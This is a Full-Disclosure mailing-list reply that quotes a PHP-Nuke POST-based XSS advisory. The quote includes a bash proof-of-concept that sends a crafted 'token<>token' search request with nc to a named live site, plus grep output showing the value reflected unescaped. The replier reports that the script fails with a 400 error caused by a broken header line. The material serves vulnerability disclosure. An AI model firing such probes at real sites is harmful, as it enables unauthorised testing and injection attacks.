ascii wrote: > Php Nuke POST XSS on steroids > > Name Php Nuke POST XSS on steroids > Systems Affected PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and > others (partially verified) > Severity Medium > Vendor http://php nuke.org/ > Advisory http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/ > Authors Francesco `ascii` Ongaro ([EMAIL PROTECTED]) > Stefano `wisec` di Paola ([EMAIL PROTECTED]) > Date 20070307 > --- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8 > > #!/bin/bash > > cat > REQ << TOKEN > POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1 > Host: www.phpnuke.org > User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) > Gecko/20070220 Firefox/2.0.0.2 > Accept: > text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 > Accept-Language: en-us,en;q=0.5 > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 > Connection: close > Referer: http://www.phpnuke.org/modules.php?name=Downloads > Cookie: lang=english > Content-Type: application/x-www-form-urlencoded > Content-Length: 23 > > query=token<>token > > TOKEN > > cat REQ | nc www.phpnuke.org 80 -vvv > > --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8 > > $ ./testcase | grep "token<>token" > DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net > www.phpnuke.org [67.15.16.43] 80 (http) open > <form > action="modules.php?name=Downloads&d_op=search&query=token<>toke > > Regards, > Francesco `ascii` Ongaro > http://www.ush.it/ > > I tried both your scripts at a few locations, and all I get back is this:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.<br /> Request header field is missing ':' separator.<br /> <pre> Gecko/20070220 Firefox/2.0.0.2</pre> </p> </body></html> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/